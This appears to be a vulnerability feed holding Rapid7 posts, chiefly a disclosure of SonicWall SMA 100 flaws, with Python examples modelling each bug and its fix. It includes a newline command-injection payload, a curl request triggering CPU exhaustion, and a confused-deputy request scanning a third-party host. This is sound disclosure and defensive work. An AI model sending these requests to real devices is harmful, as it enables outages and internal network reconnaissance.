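The write-up says isSafeCommandArg and friends reject &|$><;' and similar but
not '\\n', and that the checked CERT value reaches system("rm -rf %s").
The exact blocklist, the helper names and the certificate base directory used
here are assumptions.
"""
from __future__ import annotations

import re
import subprocess

# Assumed blocklist: the write-up names "&|$><;' and so on"; the rest is a guess.
BLOCKED_METACHARS = set("&|$><;'`\"\\")
# The only legitimate CERT values are the auto-generated newcert-N directory names.
CERT_NAME = re.compile(r"newcert-\d+")


def is_safe_command_arg_flawed(value: str) -> bool:
    """Blocklist in the spirit of the one described: a newline is not on it."""
    return not any(ch in BLOCKED_METACHARS for ch in value)


def shell_commands_seen(cert: str) -> list[str]:
    """What /bin/sh runs for system("rm -rf %s"): a newline ends one command
    and starts the next, so the attacker's text becomes a second command."""
    return [line.strip() for line in f"rm -rf {cert}".split("\n") if line.strip()]


def is_valid_cert_name(value: str) -> bool:
    """Allowlist: accept only the shape the system itself generates."""
    return CERT_NAME.fullmatch(value) is not None


def build_delete_argv(cert: str, base_dir: str) -> list[str]:
    """Validated argv for a shell-free call; no format string, no /bin/sh."""
    if not is_valid_cert_name(cert):
        raise ValueError(f"rejected certificate name: {cert!r}")
    return ["rm", "-rf", f"{base_dir}/{cert}"]


def delete_cert(cert: str, base_dir: str) -> None:
    """Safe deletion: with an argv list and shell=False (the default), '\\n'
    and every other metacharacter are just bytes in a file name."""
    subprocess.run(build_delete_argv(cert, base_dir), check=True)


def flag_form_field(name: str, value: str) -> str | None:
    """Detection side: a CR or LF in a form field bound for a command is a
    strong signal of this class of bypass, whatever the blocklist says."""
    if "\n" in value or "\r" in value:
        return f"newline in field {name}: {value!r}"
    return None


if __name__ == "__main__":
    payload = "nj\n ping 10.0.0.9 \n"  # the CERT value from the write-up
    print("flawed check accepts payload:", is_safe_command_arg_flawed(payload))
    print("shell executes:", shell_commands_seen(payload))
    print("allowlist accepts payload:", is_valid_cert_name(payload))
    print("detector:", flag_form_field("CERT", payload))
```

The point of the allowlist is that it does not need to know which characters the shell cares about: `newcert-\d+` is the only shape the application ever produces, so anything else is rejected before it gets near a command. Passing an argv list to `subprocess.run` removes the shell from the picture entirely, which is the change that actually closes the bug class rather than one more character on a blocklist.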
That said, the SMA 100 series does ship with a default password for the administrator account, most organizations let administrators choose their own passwords, and the number of users on any device who stick with the default or an easily guessed password is never zero.\n\n## CVE-2021-20040: Upload path traversal in sonicfiles\n\n**Affected versions:** 10.2.0.8-37sv and 10.2.1.2-24sv\n\nThe SMA 100 series allows users to interact with remote SMB shares through the HTTPS server. This functionality resides in the endpoint `https://address/fileshare/sonicfiles/sonicfiles`. Most of the functionality simply flows through the SMA series device and doesn't actually leave anything on the device itself, with the notable exception of `RacNumber=43`. That is supposed to write a file to the /tmp directory, but it is vulnerable to path traversal attacks.\n\nTo be a bit more specific, `RacNumber=43` takes two parameters:\n\n * `swcctn`: This value gets combined with `/tmp/` \\+ the current date to make a filename.\n * A JSON payload. The payload is de-jsonified and written to the swcctn file.\n\nThere is no validation applied to `swcctn`, so an attacker can include `../` sequences and choose the directory the file lands in. The example below writes the file "hello.html.time" to the web server's root directory:\n\n\n\nThis results in:\n\n\n\n### CVE-2021-20040 exploitation impact\n\nThere are some real limitations to exploiting CVE-2021-20040:\n\n 1. File writing is done with `nobody` privileges. That significantly limits where an attacker can write, although being able to write to the web server's root feels like a win for the attacker.\n\n 2. 
The attacker can't overwrite any existing file due to the date-derived digits appended to the filename.\n\nGiven these limitations, an attack scenario will likely involve tricking users into believing attacker-created content is a legitimate function of the SMA 100, for example, a password "reset" page that asks for a password.\n\n## CVE-2021-20041: CPU exhaustion in sonicfiles\n\n**Affected versions:** 9.0.0.11-31sv, 10.2.0.8-37sv, and 10.2.1.2-24sv\n\nAn unauthenticated, remote adversary can consume all of the device's CPU by sending crafted HTTP requests to `https://address/fileshare/sonicfiles/sonicfiles`, resulting in an infinite loop in the `fileexplorer` process. The infinite loop is due to the way `fileexplorer` parses command line options. When parsing an option that takes multiple parameters, `fileexplorer` incorrectly handles parameters that lack spaces or use the `=` symbol with the parameter. For example, the following request results in the infinite loop (the `swap` cookie value is arbitrary, since the request is unauthenticated):\n\n`curl --insecure -v --Cookie swap=bG9s \"https://10.0.0.6/fileshare/sonicfiles/sonicfiles?RacNumber=25&Arg1=smb://10.0.0.1/lol/test&Arg2=-elol&User=test&Pass=test\"`\n\nThe above request will result in `fileexplorer` being invoked like so:\n\n`/usr/sbin/fileexplorer -g smb://10.0.0.1/lol/test -elol -u test:test`\n\nParsing the "-elol" portion triggers the infinite loop. Each new request will spin up a new `fileexplorer` process. Technically speaking, on the SMA 500v, only two such requests will result in ~100% CPU usage indefinitely. Output from top:\n\n\n\n### CVE-2021-20041 exploitation impact\n\nA number of additional requests are required to truly deny availability, as this is not a one-shot denial of service request. 
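As an added example (not SonicWall's code, and not from the original post), the following Python models the two sonicfiles input-handling flaws just described, each beside a hardened version: the CVE-2021-20040 filename built from `swcctn` without validation, and the CVE-2021-20041 `Arg2` value that lands on the `fileexplorer` command line and gets parsed as an option. It also includes a small audit function for spotting both patterns in the query parameters of a logged request. The naming scheme under `/tmp`, the timestamp, the argv layout beyond what the write-up shows, and the webroot used in the traversal demo are assumptions.

```python
"""Added example, not SonicWall code: the two sonicfiles input-handling flaws
described above, each beside a hardened version.

CVE-2021-20040: RacNumber=43 builds '/tmp/' + swcctn + a date with no
validation, so '../' in swcctn walks out of /tmp.
CVE-2021-20041: RacNumber=25 copies Arg1/Arg2 onto the fileexplorer command
line, so an Arg2 such as '-elol' is parsed as an option, not a destination.

Assumptions: the exact naming scheme under /tmp, the timestamp format, the
argv layout beyond what the write-up shows, and the webroot in the demo.
"""
from __future__ import annotations

import posixpath
import re

UPLOAD_DIR = "/tmp"
FILEEXPLORER = "/usr/sbin/fileexplorer"
# host[:port]/share/path and nothing else; matches the shapes quoted above.
SMB_URL = re.compile(r"^smb://[A-Za-z0-9.-]+(?::\d{1,5})?(?:/[A-Za-z0-9._-]+)+$")


def upload_path_vulnerable(swcctn: str, stamp: str) -> str:
    """String concatenation only, as described; normpath shows where the
    kernel actually puts the file."""
    return posixpath.normpath(f"{UPLOAD_DIR}/{swcctn}.{stamp}")


def upload_path_fixed(swcctn: str, stamp: str) -> str:
    """Allowlist the name, then prove the resolved path is still under /tmp."""
    if not re.fullmatch(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}", swcctn):
        raise ValueError("swcctn must be a plain file name")
    path = posixpath.normpath(posixpath.join(UPLOAD_DIR, f"{swcctn}.{stamp}"))
    # Defence in depth: even if the allowlist is loosened later, never escape.
    if posixpath.commonpath([UPLOAD_DIR, path]) != UPLOAD_DIR:
        raise ValueError("path escapes upload directory")
    return path


def looks_like_option(value: str) -> bool:
    """True for values a getopt-style parser would treat as an option, or
    that could split the command line."""
    return value.startswith("-") or any(c in value for c in "\x00\r\n")


def fileexplorer_argv_vulnerable(arg1: str, arg2: str, user: str, pw: str) -> list[str]:
    """Parameters dropped onto the command line as the write-up shows."""
    return [FILEEXPLORER, "-g", arg1, arg2, "-u", f"{user}:{pw}"]


def fileexplorer_argv_fixed(arg1: str, arg2: str, user: str, pw: str) -> list[str]:
    """Reject anything that fileexplorer could mistake for an option."""
    if not SMB_URL.match(arg1):
        raise ValueError("Arg1 is not a well-formed smb:// URL")
    if not arg2 or "/" in arg2 or looks_like_option(arg2):
        raise ValueError("Arg2 must be a plain destination name")
    if looks_like_option(user) or ":" in user or looks_like_option(pw):
        raise ValueError("credentials contain unsafe characters")
    return [FILEEXPLORER, "-g", arg1, arg2, "-u", f"{user}:{pw}"]


def audit_request(params: dict[str, str]) -> list[str]:
    """Flag both patterns in the query parameters of a logged sonicfiles request."""
    findings = []
    swcctn = params.get("swcctn", "")
    if ".." in swcctn or "/" in swcctn:
        findings.append("traversal sequence in swcctn (CVE-2021-20040 pattern)")
    for key in ("Arg1", "Arg2", "User", "Pass"):
        if looks_like_option(params.get(key, "")):
            findings.append(f"option-like value in {key} (CVE-2021-20041 pattern)")
    return findings


if __name__ == "__main__":
    # Constructed inputs: the traversal aims at an assumed webroot.
    print(upload_path_vulnerable("../var/www/html/hello.html", "1641924000"))
    print(fileexplorer_argv_vulnerable("smb://10.0.0.1/lol/test", "-elol", "test", "test"))
    print(audit_request({"RacNumber": "25", "Arg1": "smb://10.0.0.1/lol/test",
                         "Arg2": "-elol", "User": "test", "Pass": "test"}))
```

Two design points are worth noting. The path check validates the name and then re-checks the normalised result against the base directory, because an allowlist alone is only as good as its last edit. The argv check refuses values that start with `-` rather than relying on `fileexplorer` to honour an end-of-options marker, since the write-up gives no evidence that it does; the same `looks_like_option` test doubles as the detection rule in `audit_request`.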
It should also be noted that this is a parameter injection issue \u2014 specifically, the -e parameter is injected, and if the injection in this form didn't result in an infinite loop, the attacker would have been able to exfiltrate arbitrary files (which of course would be more useful to an attacker).\n\n## CVE-2021-20042: Confused deputy in sonicfiles\n\n**Affected versions:** 9.0.0.11-31sv, 10.2.0.8-37sv, and 10.2.1.2-24sv\n\nAn unauthenticated, remote attacker can use SMA 100 series devices as an "unintended proxy or intermediary," also known as a Confused Deputy attack. In short, that means an outside attacker can use the SMA 100 series device to access systems reachable via the device's internal-facing network interfaces. This is due to the fact that the sonicfiles component does not appear to validate the requestor's authentication cookie until _after_ the `fileexplorer` request is made on the attacker's behalf. Furthermore, the check that validates whether the endpoint `fileexplorer` is about to access is allowed has been commented out for RacNumber 25 (aka COPY_FROM). Note the "_is_url_allow" logic below:\n\n\n\nThis results in the following:\n\n * An attacker can bypass the SMA 100 series device's firewall with SMB-based requests.\n * An attacker can make arbitrary read/write SMB requests to a third party the SMA 100 series device can reach. 
File creation, file deletion, and file renaming are all possible.\n * An attacker can make TCP connection requests to arbitrary IP:port on a third party, allowing the remote attacker to map out available IP/ports on the protected network.\n\nJust as a purely theoretical example, the following request sends a SYN to 8.8.8.8:80:\n\n`curl --insecure -v --Cookie swap=bG9s \"https://10.0.0.6/fileshare/sonicfiles/sonicfiles?RacNumber=25&Arg1=smb://8.8.8.8:80/test&Arg2=test&User=test&Pass=test\"`\n\n### CVE-2021-20042 exploitation impact\n\nThere are two significant limitations to this attack:\n\n * The attacker does have to honor the third-party SMB server's authentication. So to read/write, they'll need credentials (or anonymous/guest access).\n * An unauthenticated attacker will not see responses, so the attack will be blind. Determining the result of an attack/scan will rely on timing and server error codes.\n\nGiven these constraints, an attacker does not command complete control of resources on the protected side of the network with this issue and is likely only able to map responsive services from the protected network (with the notable exception of being able to write to, but not read from, unprotected SMB shares).\n\n## Vendor statement\n\n_SonicWall routinely collaborates with third-party researchers, penetration testers, and forensic analysis firms to ensure that its products meet or exceed security best practices. One of these valued allies, Rapid7, recently identified a range of vulnerabilities to the SMA 100 series VPN product line, which SonicWall quickly verified. SonicWall designed, tested, and published patches to correct the issues and communicated these mitigations to customers and partners. 
At the time of publishing, there are no known exploitations of these vulnerabilities in the wild._\n\n## Remediation\n\nAs these devices are designed to be exposed to the internet, the only effective remediation for these issues is to apply the vendor-supplied updates.\n\n## Disclosure timeline\n\n * October 2021: Issues discovered by Jake Baines of Rapid7\n * Mon, Oct 18, 2021: Initial disclosure to SonicWall via [PSIRT@sonicwall.com](<mailto:PSIRT@sonicwall.com>)\n * Mon, Oct 18, 2021: Acknowledgement from the vendor\n * Thu, Oct 28, 2021: Validation completed and status update provided by the vendor\n * Tue, Nov 9, 2021: Test build with updates provided by the vendor\n * Tue, Dec 7, 2021: [SNWLID-2021-0026 released](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) by the vendor to customers\n * Tue, Dec 7, 2021: Vulnerability checks available to InsightVM and Nexpose customers for all CVEs in this disclosure\n * Tue, Jan 11, 2022: This public disclosure\n * Tue, Jan 11, 2022: [Module for CVE-2021-20039 PR#16041](<https://github.com/rapid7/metasploit-framework/pull/16041>) provided to Metasploit Framework\n * Tue, Jan 11, 2022: Rapid7 analyses published for [CVE-2021-20038](<https://attackerkb.com/topics/QyXRC1wbvC/cve-2021-20038/rapid7-analysis>) and [CVE-2021-20039](<https://attackerkb.com/topics/9szJhq46lw/cve-2021-20039/rapid7-analysis>) in AttackerKB.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-11T14:00:00", "type": "rapid7blog", "title": 
"CVE-2021-20038..42: SonicWall SMA 100 Multiple Vulnerabilities (FIXED)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038", "CVE-2021-20039", "CVE-2021-20040", "CVE-2021-20041", "CVE-2021-20042"], "modified": "2022-01-11T14:00:00", "id": "RAPID7BLOG:896942D0CDF4701FAF0531A15C44DA19", "href": "https://blog.rapid7.com/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-12-11T09:03:50", "description": "## Summary\n\n\n\nOn December 7, 2021, SonicWall released a [security advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) that includes patching guidance for **five vulnerabilities in SonicWall SMA 100 series devices that were discovered by Rapid7** (including CVE-2021-20038 which is rated CVSSv3 9.8, critical), as well as several other CVEs discovered by NCC Group. 
While no exploitation of these vulnerabilities has been observed yet, SonicWall \u201cstrongly urges\u201d organizations to apply the appropriate patches.\n\nFrom SonicWall\u2019s advisory:\n\nIssue ID | Summary | CVE | CVSS | Reporting Party | Impacted Versions \n---|---|---|---|---|--- \nSMA-3217 | Unauthenticated Stack-Based Buffer Overflow | CVE-2021-20038 | 9.8 | Rapid7 | 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv \nSMA-3204 | Authenticated Command Injection | CVE-2021-20039 | 7.2 | Rapid7 | 9.0.0.11-31sv, 10.2.0.8-37sv, 10.2.1.1-19sv \nSMA-3206 | Unauthenticated File Upload Path Traversal | CVE-2021-20040 | 6.5 | Rapid7, NCCGroup | 10.2.0.8-37sv, 10.2.1.1-19sv \nSMA-3207 | Unauthenticated CPU Exhaustion | CVE-2021-20041 | 7.5 | Rapid7 | 9.0.0.11-31sv, 10.2.0.8-37sv, 10.2.1.1-19sv \nSMA-3208 | Unauthenticated Confused Deputy | CVE-2021-20042 | 6.3 | Rapid7 | 9.0.0.11-31sv, 10.2.0.8-37sv, 10.2.1.1-19sv \nSMA-3231 | Heap-Based Buffer Overflow | CVE-2021-20043 | 8.8 | NCCGroup | 10.2.0.8-37sv, 10.2.1.1-19sv \nSMA-3233 | Post-Authentication Remote Command Execution | CVE-2021-20044 | 7.2 | NCCGroup | 10.2.0.8-37sv, 10.2.1.1-19sv \nSMA-3235 | Multiple Unauthenticated Heap-Based and Stack Based Buffer Overflow | CVE-2021-20045 | 9.4 | NCCGroup | 10.2.0.8-37sv, 10.2.1.1-19sv \n \n## Affected versions\n\nThe issues listed above impact SMA 100 series appliances (SMA 200, 210, 400, 410, 500v).\n\n## Full disclosure scheduled for January 2022\n\nRapid7 will release the technical details and proof-of-concept code in January 2022 as part of our coordinated vulnerability disclosure process.\n\n## Guidance\n\nAs with all critical, network-edge appliances, Rapid7 recommends that vulnerabilities be patched immediately. SonicWall devices have [previously been exploited at scale](<https://attackerkb.com/topics/BFh8B71dfn/sonicwall-sma-100-series-10-x-firmware-zero-day-vulnerability/rapid7-analysis?referrer=blog>) in 2021 and are generally high-value targets for attackers. 
SonicWall does not list any workarounds for these issues. For more information, see SonicWall\u2019s [advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>).\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to all eight of the CVEs in [this advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026>) with vulnerability checks in the December 7, 2021 content release.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-08T18:57:52", "type": "rapid7blog", "title": "Patch Now: SonicWall Fixes Multiple Vulnerabilities in SMA 100 Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20038", "CVE-2021-20039", "CVE-2021-20040", "CVE-2021-20041", "CVE-2021-20042", "CVE-2021-20043", "CVE-2021-20044", "CVE-2021-20045"], "modified": "2021-12-08T18:57:52", "id": "RAPID7BLOG:000305BC832103845A712987C0E849E4", "href": 
"https://blog.rapid7.com/2021/12/08/patch-now-sonicwall-fixes-multiple-vulnerabilities-in-sma-100-devices/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-01-08T23:04:20", "description": "\n\n_This post is co-authored by Blake Cifelli, Senior Advisory Services Consultant._\n\nIn today\u2019s cybersecurity world, risks evolve faster than we can remediate them. To meet our goals and become resilient to these fast changes, we need the right balance of automation and human interaction. Enabling rapid response for protecting information systems is paramount, but how does a business reach this level of reaction?\n\nHow can organizations maintain a standard of excellence to their responses in high-risk situations?\n\nWhere do you even begin to respond to a critical vulnerability like [the one in Apache\u2019s Log4j Java library (a.k.a. Log4Shell)](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)?\n\nMost importantly, how do we transform the tactical actions that need to take place into an effective strategy to scale?\n\n## 1\\. Empower personnel\n\nThe personnel with the knowledge about your various solutions must be empowered to make the decisions necessary to address your company\u2019s information technology needs. If those team members don\u2019t feel they can make those decisions, then they will defer to management \u2014 but managers may not know the intricacies of the solutions and could create a natural bottleneck, since there are going to be more decision points than managers to make decisions. Providing personnel with policy documents with uniform criteria for evaluating the risk these new vulnerabilities present, the ways to respond, and the time expectations is paramount for a timely resolution.\n\nIn a typical risk resolution process, there are many gates to safeguard our systems. 
This helps ensure that whatever change happens increases the solution\u2019s confidentiality, integrity, or availability rather than diminishing it. However, a situation like Log4Shell needs to be treated like an incident response activity to quickly address the risk. Create a task force to effectively answer the important questions like:\n\n * How do we find vulnerable systems?\n * Which systems are vulnerable?\n * What options are there for a fix? One size may not fit all.\n * Who is going to track changes?\n * Who is going to validate the fix is in place?\n\nUtilizing a strong incident response procedure to answer all these questions will assist with prioritization and remediation to an acceptable level of risk.\n\n## 2\\. Promote visibility\n\nAny standard [vulnerability management lifecycle](<https://www.rapid7.com/fundamentals/vulnerability-management-program-framework/>) process begins with identifying affected systems to assess and evaluate the scope of a vulnerability\u2019s presence on the network. The approach should utilize both proactive and reactive efforts through a combination of tools and well-documented processes to streamline and scale the response effectively.\n\nA proactive process would first involve having well-documented use of any such library versions internally in an inventory, so that discoverability and traceability are much more narrowly focused efforts. If you conduct authenticated vulnerability scans continuously on pre-scheduled frequencies, this will also help with identification of third-party software utilizing this library over time. Classifying system criticality within the vulnerability management tool will help you more effectively scale future remediation processes.\n\nThese proactive processes help jumpstart an initial response, but you\u2019ll still need reactive efforts to help ensure effective and timely remediation. 
[Vulnerability scanning](<https://www.rapid7.com/fundamentals/vulnerability-management-and-scanning/>) tools will receive signature updates regarding this newly discovered vulnerability, which will require updating your vulnerability management tool and initiating one-off alternative scans that may deviate from pre-scheduled rotations. These alternative scans should include tiered phases, so the most critical systems receive scan priority, and then remaining systems are scanned in order of criticality. Leveraging the pre-existing system criticality classification will significantly expedite this process.\n\nA [security information and event management (SIEM)](<https://www.rapid7.com/fundamentals/siem/>) tool can also assist with identifying, tracking, and alerting on any suspicious activity that may be tied to exploitation of this vulnerability. Host agents and network detection systems that report back to the SIEM should be closely monitored, and any activity or traffic that deviates from baselines should receive an active response. You may need to adjust logging and alerting rules and thresholds to ensure your efforts are strategically focused.\n\nTactical processes help you achieve this continuous identification, but you still need to orchestrate and execute them through strategic planning to remain timely, efficient, and effective. Well-documented asset inventories and appropriate system criticality classifications help you prioritize your efforts, while continuous vulnerability scans and leveraging vulnerability management and SIEM tools help to identify, track, and manage vulnerability exposure. Leadership should provide the direction to guide these activities from inception to implementation through effective communication and allocation of resources. Lay out a short-term roadmap for tracking objectives and quick wins as part of the remediation process, so you can quickly and concisely show how you\u2019re tracking toward goals.\n\n## 3\\. 
Implement prioritization and mitigation\n\nNow that your team has successfully identified all affected systems, you\u2019ll need to roll out patches to those systems on a continuous basis during the next phase to mitigate risk. Current enterprise-wide patching timelines may require adjustment due to the urgency associated with such critical vulnerabilities. Patch testing and rollout phases must be expedited to support a more timely and effective response.\n\nMuch like the vulnerability scans, our [patch management](<https://www.rapid7.com/fundamentals/patch-management/>) response should be ordered by system criticality, with the caveat that a non-critical pilot group or pilot system should be patched first to confirm there are no adverse effects before patches roll out in order of criticality. If you have a full test environment configured, you can test patches on critical systems first within that environment and then roll them out in production according to criticality. The testing timeline itself should be reduced throughout all standard phases of a testing cycle \u2014 you may even need to eliminate certain testing phases altogether. The rollout timelines for patches across all systems will need to be expedited as well to ensure as timely coverage as possible. If your environment has widespread use of the vulnerable library, you may require reductions in timelines of anywhere from 25% to 50%.\n\nEmergency patching procedures should provide for timely testing and production rollouts within roughly half the time of a normal patching cycle, or 5 to 10 days at a maximum for critical systems to minimize breach potential as quickly as possible. Also keep in mind that some vulnerabilities may involve more than just application of a simple patch \u2014 configuration changes may also be necessary to further mitigate potential exploitation by an adversary.\n\n## 4\\. 
Validate remediation\n\nNow, you\u2019ve deployed patches to all affected systems, so the mitigation efforts are complete, right? While you may want to shift your focus back to other tasks, it\u2019s essential to maintain continuous identification processes to ensure that no stone remains unturned.\n\nThe vulnerability management validation phase leverages those reactive identification processes, in addition to patch management processes, to assist in efficient and effective vulnerability remediation for affected systems. This stage involves re-scanning initially identified vulnerable systems to assess successful patch application and performing additional open scans of the network to ensure that there are no lingering systems that may still be affected by the vulnerability but weren\u2019t originally identified \u2014 or perhaps weren\u2019t successfully patched as part of the patch management process. This cycle of continuous validation will remain in effect until \u201cclean\u201d scans are reported across the enterprise regarding this vulnerability.\n\nSince the Log4j logging library is widely used throughout many enterprise applications and even unknowingly embedded in so many others, continuous validation will become crucial in ensuring your organization remains vigilant and can mitigate the vulnerability quickly and effectively as you continue to discover affected systems.\n\n## 5\\. Regularly review risks\n\nA vulnerability management lifecycle rarely ever comes to a true end. As adversaries and security evangelists further evaluate a specific vulnerability over time, new methods of exploitation are identified, affected versions increase in scope and scale, and recent patches and fixes are found to be ineffective. This leaves organizations potentially open to exposure and at a loss for the best path forward. 
Continuous review of the trends surrounding an ongoing critical vulnerability will help organizations remain aware of both the impact and the current mitigating measures that have been most successful. Additionally, leveraging other solutions can help further identify and launch a coordinated defense-in-depth response to any potential malicious activity that may be associated with such vulnerabilities.\n\nWorking to continuously identify, mitigate, validate, and review vulnerabilities throughout their inevitable course will require commitment and fortitude to achieve the best results, but once the tides have subsided with Log4Shell and you\u2019ve successfully and securely endured one of the worst security vulnerability exposures in a decade by following these processes, you can rest assured that your incident response processes were well-tested during this endeavor \u2014 and your IT security budget should be more than solidified for the next few years to come. \n\nCheck out our additional resources for further insight into this vulnerability, mitigating measures, and tools available to assist.\n\n * [Log4Shell Resource Hub](<https://www.rapid7.com/log4j-cve-2021-44228-resources/>)\n * [Log4Shell Resources for Rapid7 Customers](<https://www.rapid7.com/log4j-cve-2021-44228-customer-resources/>)\n * [Widespread Exploitation of Critical Remote Code Execution in Apache Log4j](<https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/>)\n * [Update on Log4Shell\u2019s Impact on Rapid7 Solutions and Systems](<https://www.rapid7.com/blog/post/2021/12/14/update-on-log4shells-impact-on-rapid7-solutions-and-systems/>)\n * [Using InsightVM to Find Apache Log4j CVE-2021-44228](<https://www.rapid7.com/blog/post/2021/12/14/using-insightvm-to-find-apache-log4j-cve-2021-44228/>)\n * [InsightVM Docs page for Log4j](<https://docs.rapid7.com/insightvm/apache-log4j/>)\n * [Rapid7 analysis of Log4Shell on 
AttackerKB](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-07T18:20:22", "type": "rapid7blog", "title": "Log4Shell Strategic Response: 5 Practices for Vulnerability Management at Scale", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-07T18:20:22", "id": "RAPID7BLOG:7F1312E79E0925118565C90443170051", "href": "https://blog.rapid7.com/2022/01/07/log4shell-strategic-response-5-practices-for-vulnerability-management-at-scale/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-03T15:13:33", "description": "\n\n_**Editor\u2019s note: **We had planned to publish our [Hacky Holidays](<https://www.rapid7.com/blog/series/hacky-holidays/hacky-holidays-2021/>) blog series throughout December 2021 \u2013 but then _[_Log4Shell_](<https://www.rapid7.com/blog/post/2021/12/15/the-everypersons-guide-to-log4shell-cve-2021-44228/>)_ happened, 
and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it\u2019s 2022, we\u2019re feeling in need of some holiday cheer, and we hope you\u2019re still in the spirit of the season, too. Throughout January, we\u2019ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let\u2019s pick up where we left off._\n\nMy kid stopped believing this year.\n\nI did what they recommend: said she was big enough to know the truth, that we are all Santas, and now she must be one, too. Every one of us \u2014 whether December means Christmas, Hanukkah, Kwanzaa, or just winter \u2014 is expected to give generously and sometimes anonymously, just to spread the goodness. And ideally, we do it a whole lot more than once a year.\n\nThen, the a-ha moment arrived. You know who some of the best Santas on Earth are? The cybersecurity community. It\u2019s full of givers, mostly with names we\u2019ll never know. \n\nRewind to the early years of the internet: A 15-year-old [hacked the source code](<https://abcnews.go.com/Technology/story?id=119423&page=1>) for NASA\u2019s International Space Station; Russians [extracted $10 million](<https://www.latimes.com/archives/la-xpm-1995-08-19-fi-36656-story.html>) from Citibank; the Department of Justice and Los Alamos National Laboratory (site of the Manhattan Project and home to classified nuclear and weapons secrets) were breached. \n\n## What happened next? Organized beneficence\n\nIn 1999, [MITRE researchers](<https://cve.mitre.org/docs/docs-2002/prog-rpt_06-02/index.html>) released the first searchable public record of 321 common vulnerabilities. In less than 3 years, there were 2,000+ vulnerabilities shared. 
